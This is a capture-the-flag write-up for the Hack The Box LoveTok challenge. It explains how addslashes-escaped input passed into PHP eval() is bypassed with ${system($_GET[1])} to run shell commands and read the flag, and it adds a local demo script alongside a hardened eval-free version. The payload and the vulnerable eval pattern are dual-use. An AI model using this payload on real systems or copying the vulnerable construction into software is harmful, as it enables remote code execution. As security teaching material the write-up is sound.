This post documents my process for solving the LoveTok box on Hack The Box. The challenge involves reviewing PHP source code, understanding why addslashes is the wrong defence for a string that ends up inside eval, and turning that into command execution via system().

Description

True love is tough, and even harder to find. Once the sun has set, the lights close and the bell has rung… you find yourself licking your wounds and contemplating human existence. You wish to have somebody important in your life to share the experiences that come with it, the good and the bad. This is why we made LoveTok, the brand new service that accurately predicts in the threshold of milliseconds when love will come knockin’ (at your door). Come and check it out, but don’t try to cheat love because love cheats back.

The challenge ships the application source code as a download; the analysis below is based on reading it rather than on black-box testing.

Reference:
https://swordandcircuitboard.com/php-addslashes-command-injection-bypass/

Source Code Review

TimeModel.php:

<?php
class TimeModel
{
    public function __construct($format)
    {
        // User-controlled date() format; addslashes() only escapes ' " \ and NUL
        $this->format = addslashes($format);

        [ $d, $h, $m, $s ] = [ rand(1, 6), rand(1, 23), rand(1, 59), rand(1, 69) ];
        $this->prediction = "+${d} day +${h} hour +${m} minute +${s} second";
    }

    public function getTime()
    {
        // The format is spliced into PHP source text and executed with eval()
        eval('$time = date("' . $this->format . '", strtotime("' . $this->prediction . '"));');
        return isset($time) ? $time : 'Something went terribly wrong';
    }
}

The key line is:

eval('$time = date("' . $this->format . '", strtotime("' . $this->prediction . '"));');

$format comes straight from the request and is only passed through addslashes, which prefixes single quotes, double quotes, backslashes and NUL bytes with a backslash. That is enough to stop the obvious attack of closing the double-quoted string and appending a statement, but it leaves $, {, }, (, ), [ and ] untouched. Inside a PHP double-quoted string the complex curly syntax ${expr} is still parsed and evaluated, and because the whole date() call is assembled as text and handed to eval, anything placed in that expression runs as PHP code.

Exploitation

The reference article above describes the bypass for this exact addslashes-into-eval pattern.

A payload that works against the challenge, supplied as the format value:

${system($_GET[1])}&1=cat+../flagBweet

Two details make it work. The ${...} block is evaluated inside the double-quoted string that eval executes, so system() runs before date() is ever called and its output lands in the HTTP response. The command itself is read from $_GET[1] rather than from a named key, because a numeric index needs no quotes; a key such as $_GET['c'] would have its quotes turned into \' by addslashes and break the eval'd code. If the request is sent with a client that does not URL-encode for you, encode $ as %24, { as %7B and } as %7D. With the command set to cat the flag file, the flag is returned in the page.
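The following is an added example for this writeup, not code from the challenge. It reproduces the vulnerable eval() construction from TimeModel.php with a fixed prediction instead of rand(), shows what addslashes() does and does not change, runs the ${...} payload with a harmless command so the interpolation can be observed locally, and puts a hardened version beside it that passes the format to date() as an ordinary argument with an allowlist. The attacker-controlled $_GET[1] is set by the script itself so it runs offline from the command line; the allowlist character class is an assumption to be adjusted to the format letters an application actually needs.

```php
<?php
// Added example for this writeup, not part of the LoveTok challenge source.
// Assumption: the attacker controls $_GET[1]; here the script assigns it
// itself so the file can be run offline with `php example.php`.

const PREDICTION = '+1 day +2 hour +3 minute +4 second'; // fixed instead of rand()

// Same construction as TimeModel::getTime(): addslashes() then a string-built eval().
function vulnerableGetTime(string $format): string
{
    $format = addslashes($format);
    eval('$time = date("' . $format . '", strtotime("' . PREDICTION . '"));');
    return isset($time) ? $time : 'Something went terribly wrong';
}

// Hardened replacement: date() receives the format as a plain argument, so
// there is no code context to inject into, and the format is allowlisted.
// The character class is an assumption; widen it only with date() format
// letters you need (backslash is deliberately excluded).
function hardenedGetTime(string $format): string
{
    if (!preg_match('/^[A-Za-z0-9 :\/\-.,]+$/', $format)) {
        throw new InvalidArgumentException('Rejected format string');
    }
    return date($format, strtotime(PREDICTION));
}

// 1. What addslashes() changes: quotes and backslashes get a backslash,
//    while $, {, }, (, ) and [ ] pass through untouched.
$probes = [
    '"; system("id"); //',   // classic break-out attempt, neutralised
    '${system($_GET[1])}',   // complex curly interpolation, untouched
];
foreach ($probes as $probe) {
    printf("%-24s -> %s\n", $probe, addslashes($probe));
}

// 2. The writeup's payload with a harmless command. Inside the eval'd
//    double-quoted string, ${system($_GET[1])} is evaluated as an expression:
//    system() runs the command and prints its output before date() is called.
//    system() returns the last output line, which PHP then tries to use as a
//    variable name, so an "Undefined variable" warning follows; the command
//    has already run by then. PHP 8.2+ also emits a deprecation notice for
//    ${} in strings but still executes it.
$_GET[1] = 'echo injected-command-ran';   // constructed stand-in for &1=cat+../flag...
echo vulnerableGetTime('${system($_GET[1])}'), "\n";

// 3. The same input against the hardened version is rejected before date() runs,
//    while a legitimate format still works.
try {
    hardenedGetTime('${system($_GET[1])}');
} catch (InvalidArgumentException $e) {
    echo "hardened: ", $e->getMessage(), "\n";
}
echo "hardened: ", hardenedGetTime('Y-m-d H:i:s'), "\n";
```

Running it prints the two addslashes() results, then the line injected-command-ran from system(), then the rejection message and a normal timestamp from the hardened function. The real fix is the absence of eval, not the allowlist: once the format is an argument instead of source text, addslashes has nothing left to protect.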

Lessons Learned

  • Never use addslashes as your only input validation/sanitization. Always use proper validation and context-aware escaping.
  • PHP’s eval is dangerous when handling user-supplied data, especially if input is not strictly sanitized.
  • Reviewing source code is a powerful way to discover hidden vulnerabilities and exploitation techniques.
  • Attackers look for language features the sanitizer does not account for; here PHP's ${...} string interpolation and variable variables run an expression without needing a single quote character.

Writeup based on my own exploitation process and references from the CTF and web security communities.